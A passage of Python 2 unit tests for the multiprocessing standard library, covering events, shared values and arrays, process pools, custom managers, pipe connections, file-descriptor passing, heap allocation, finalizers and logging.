def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), range(10))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_accepts_long(self):
arr = self.Array('i', 10L)
self.assertEqual(len(arr), 10)
raw_arr = self.RawArray('i', 10L)
self.assertEqual(len(raw_arr), 10)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
self.assertRaises(ValueError, multiprocessing.Pool, -1)
self.assertRaises(ValueError, multiprocessing.Pool, 0)
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test that manager has expected number of shared objects left
#
class _TestZZZNumberOfObjects(BaseTestCase):
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
multiprocessing.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
debug_info = self.manager._debug_info()
if refs != EXPECTED_NUMBER:
print self.manager._debug_info()
print debug_info
self.assertEqual(refs, EXPECTED_NUMBER)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, object)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
test_support.gc_collect()
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.start()
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
with open(test_support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test_support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
with open(test_support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test_support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
#
# Test of sending connection and socket objects between processes
#
"""
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
multiprocessing.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
"""
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# XXX There should be a better way to release resources for a
# single block
if i % maxblocks == 0:
import gc; gc.collect()
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
#thresholds = gc.get_threshold()
#self.addCleanup(gc.set_threshold, *thresholds)
#gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', range(10), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
@unittest.skipUnless(test_support.check_impl_detail(pypy=False), "pypy ctypes differences")
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
test_support.gc_collect()
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = [
'multiprocessing', 'multiprocessing.connection',
'multiprocessing.heap', 'multiprocessing.managers',
'multiprocessing.pool', 'multiprocessing.process',
'multiprocessing.synchronize', 'multiprocessing.util'
]
if HAS_REDUCTION:
modules.append('multiprocessing.reduction')
if c_int is not None:
# This module requires _ctypes
modules.append('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = _multiprocessing.Connection(44977608)
self.assertRaises(IOError, conn.poll)
self.assertRaises(IOError, _multiprocessing.Connection, -1)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
